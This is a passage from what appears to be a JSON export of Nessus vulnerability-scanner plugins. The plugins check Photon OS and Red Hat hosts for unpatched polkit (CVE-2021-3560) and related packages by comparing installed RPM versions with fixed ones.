rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'Alma-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = 
package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release && (!exists_check || rpm_exists(release:release, rpm:exists_check))) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'polkit / polkit-devel / polkit-docs / polkit-libs');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T14:51:22", "description": "An update of the polkit package has been released.", "cvss3": {}, "published": "2021-06-04T00:00:00", "type": "nessus", "title": "Photon OS 2.0: Polkit PHSA-2021-2.0-0350", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:polkit", "cpe:/o:vmware:photonos:2.0"], "id": "PHOTONOS_PHSA-2021-2_0-0350_POLKIT.NASL", "href": "https://www.tenable.com/plugins/nessus/150288", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-2.0-0350. 
The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150288);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Photon OS 2.0: Polkit PHSA-2021-2.0-0350\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the polkit package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-350.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:vmware:photonos:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 2.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'polkit-0.113-6.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'polkit-devel-0.113-6.ph2')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'polkit');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-15T15:56:12", "description": "The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2021:2555 advisory.\n\n - 
dhcp: stack-based buffer overflow when parsing statements with colon-separated hex digits in config or lease files in dhcpd and dhclient (CVE-2021-25217)\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-07-06T00:00:00", "type": "nessus", "title": "RHEL 7 / 8 : OpenShift Container Platform 4.7.19 packages and (RHSA-2021:2555)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-25217", "CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:8", "p-cpe:/a:redhat:enterprise_linux:cri-o", "p-cpe:/a:redhat:enterprise_linux:dhcp-client", "p-cpe:/a:redhat:enterprise_linux:dhcp-common", "p-cpe:/a:redhat:enterprise_linux:dhcp-libs", "p-cpe:/a:redhat:enterprise_linux:openshift-clients", "p-cpe:/a:redhat:enterprise_linux:openshift-clients-redistributable", "p-cpe:/a:redhat:enterprise_linux:openshift-kuryr-cni", "p-cpe:/a:redhat:enterprise_linux:openshift-kuryr-common", "p-cpe:/a:redhat:enterprise_linux:openshift-kuryr-controller", "p-cpe:/a:redhat:enterprise_linux:polkit", "p-cpe:/a:redhat:enterprise_linux:polkit-libs", "p-cpe:/a:redhat:enterprise_linux:python3-kuryr-kubernetes"], "id": "REDHAT-RHSA-2021-2555.NASL", "href": "https://www.tenable.com/plugins/nessus/151426", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:2555. 
The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151426);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\", \"CVE-2021-25217\");\n script_xref(name:\"RHSA\", value:\"2021:2555\");\n script_xref(name:\"IAVB\", value:\"2021-B-0032-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"RHEL 7 / 8 : OpenShift Container Platform 4.7.19 packages and (RHSA-2021:2555)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:2555 advisory.\n\n - dhcp: stack-based buffer overflow when parsing statements with colon-separated hex digits in config or\n lease files in dhcpd and dhclient (CVE-2021-25217)\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-3560\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-25217\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:2555\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1961710\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1963258\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n 
script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119, 863);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cri-o\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dhcp-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dhcp-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dhcp-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-clients-redistributable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-kuryr-cni\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:openshift-kuryr-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-kuryr-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:polkit-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-kuryr-kubernetes\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release_list(operator: 'ge', os_version: os_ver, rhel_versions: ['7','8'])) audit(AUDIT_OS_NOT, 'Red Hat 7.x / 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': 
[\n 'content/dist/layered/rhel8/s390x/rhocp/4.7/debug',\n 'content/dist/layered/rhel8/s390x/rhocp/4.7/os',\n 'content/dist/layered/rhel8/s390x/rhocp/4.7/source/SRPMS',\n 'content/dist/layered/rhel8/x86_64/rhocp/4.7/debug',\n 'content/dist/layered/rhel8/x86_64/rhocp/4.7/os',\n 'content/dist/layered/rhel8/x86_64/rhocp/4.7/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'cri-o-1.20.3-6.rhaos4.7.git0d0f863.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift-hyperkube'},\n {'reference':'cri-o-1.20.3-6.rhaos4.7.git0d0f863.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift-hyperkube'},\n {'reference':'dhcp-client-4.3.6-41.el8_3.1', 'cpu':'x86_64', 'release':'8', 'el_string':'el8_3', 'rpm_spec_vers_cmp':TRUE, 'epoch':'12', 'exists_check':'openshift-hyperkube'},\n {'reference':'dhcp-common-4.3.6-41.el8_3.1', 'release':'8', 'el_string':'el8_3', 'rpm_spec_vers_cmp':TRUE, 'epoch':'12', 'exists_check':'openshift-hyperkube'},\n {'reference':'dhcp-libs-4.3.6-41.el8_3.1', 'cpu':'x86_64', 'release':'8', 'el_string':'el8_3', 'rpm_spec_vers_cmp':TRUE, 'epoch':'12', 'exists_check':'openshift-hyperkube'},\n {'reference':'openshift-clients-4.7.0-202106252127.p0.git.8b4b094.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift-hyperkube'},\n {'reference':'openshift-clients-4.7.0-202106252127.p0.git.8b4b094.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift-hyperkube'},\n {'reference':'openshift-clients-redistributable-4.7.0-202106252127.p0.git.8b4b094.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift-hyperkube'},\n {'reference':'openshift-kuryr-cni-4.7.0-202106232224.p0.git.c7654fb.el8', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift-hyperkube'},\n {'reference':'openshift-kuryr-common-4.7.0-202106232224.p0.git.c7654fb.el8', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 
'exists_check':'openshift-hyperkube'},\n {'reference':'openshift-kuryr-controller-4.7.0-202106232224.p0.git.c7654fb.el8', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift-hyperkube'},\n {'reference':'polkit-0.115-11.el8_3.2', 'cpu':'x86_64', 'release':'8', 'el_string':'el8_3', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift-hyperkube'},\n {'reference':'polkit-libs-0.115-11.el8_3.2', 'cpu':'x86_64', 'release':'8', 'el_string':'el8_3', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift-hyperkube'},\n {'reference':'python3-kuryr-kubernetes-4.7.0-202106232224.p0.git.c7654fb.el8', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift-hyperkube'}\n ]\n },\n {\n 'repo_relative_urls': [\n 'content/dist/rhel/server/7/7Server/x86_64/ose/4.7/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/ose/4.7/os',\n 'content/dist/rhel/server/7/7Server/x86_64/ose/4.7/source/SRPMS',\n 'content/dist/rhel/system-z/7/7Server/s390x/ose/4.7/debug',\n 'content/dist/rhel/system-z/7/7Server/s390x/ose/4.7/os',\n 'content/dist/rhel/system-z/7/7Server/s390x/ose/4.7/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'cri-o-1.20.3-6.rhaos4.7.git0d0f863.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift-hyperkube'},\n {'reference':'openshift-clients-4.7.0-202106252127.p0.git.8b4b094.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift-hyperkube'},\n {'reference':'openshift-clients-redistributable-4.7.0-202106252127.p0.git.8b4b094.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'openshift-hyperkube'}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) 
repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'cri-o / dhcp-client / dhcp-common / dhcp-libs / openshift-clients / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T14:54:51", "description": "The remote Redhat Enterprise Linux 8 host has a package 
installed that is affected by multiple vulnerabilities as referenced in the RHSA-2021:2522 advisory.\n\n - hw: vt-d related privilege escalation (CVE-2020-24489)\n\n - glib: integer overflow in g_bytes_new function on 64-bit platforms due to an implicit cast from 64 bits to 32 bits (CVE-2021-27219)\n\n - kernel: userspace applications can misuse the KVM API to cause a write of 16 bytes at an offset up to 32 GB from vcpu->run (CVE-2021-3501)\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-06-22T00:00:00", "type": "nessus", "title": "RHEL 8 : Red Hat Virtualization Host security update [ovirt-4.4.6] (Important) (RHSA-2021:2522)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-24489", "CVE-2021-27219", "CVE-2021-3501", "CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:8", "p-cpe:/a:redhat:enterprise_linux:redhat-virtualization-host-image-update"], "id": "REDHAT-RHSA-2021-2522.NASL", "href": "https://www.tenable.com/plugins/nessus/150950", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:2522. 
The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150950);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\n \"CVE-2020-24489\",\n \"CVE-2021-3501\",\n \"CVE-2021-3560\",\n \"CVE-2021-27219\"\n );\n script_xref(name:\"RHSA\", value:\"2021:2522\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"RHEL 8 : Red Hat Virtualization Host security update [ovirt-4.4.6] (Important) (RHSA-2021:2522)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has a package installed that is affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:2522 advisory.\n\n - hw: vt-d related privilege escalation (CVE-2020-24489)\n\n - glib: integer overflow in g_bytes_new function on 64-bit platforms due to an implicit cast from 64 bits to\n 32 bits (CVE-2021-27219)\n\n - kernel: userspace applications can misuse the KVM API to cause a write of 16 bytes at an offset up to 32\n GB from vcpu->run (CVE-2021-3501)\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-24489\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-3501\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-3560\");\n script_set_attribute(attribute:\"see_also\", 
value:\"https://access.redhat.com/security/cve/CVE-2021-27219\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:2522\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1929858\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1950136\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1961710\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1962650\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected redhat-virtualization-host-image-update package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-24489\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(190, 459, 787, 863);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:redhat-virtualization-host-image-update\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'Red Hat 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/layered/rhel8/x86_64/rhv-mgmt-agent/4/debug',\n 'content/dist/layered/rhel8/x86_64/rhv-mgmt-agent/4/os',\n 'content/dist/layered/rhel8/x86_64/rhv-mgmt-agent/4/source/SRPMS',\n 'content/dist/layered/rhel8/x86_64/rhv-tools/4/debug',\n 'content/dist/layered/rhel8/x86_64/rhv-tools/4/os',\n 'content/dist/layered/rhel8/x86_64/rhv-tools/4/source/SRPMS',\n 
'content/dist/layered/rhel8/x86_64/rhvh-build/4/debug',\n 'content/dist/layered/rhel8/x86_64/rhvh-build/4/os',\n 'content/dist/layered/rhel8/x86_64/rhvh-build/4/source/SRPMS',\n 'content/dist/layered/rhel8/x86_64/rhvh/4/debug',\n 'content/dist/layered/rhel8/x86_64/rhvh/4/os',\n 'content/dist/layered/rhel8/x86_64/rhvh/4/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'redhat-virtualization-host-image-update-4.4.6-20210615.0.el8_4', 'cpu':'x86_64', 'release':'8', 'el_string':'el8_4', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'redhat-release-virtualization-host-4'}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = 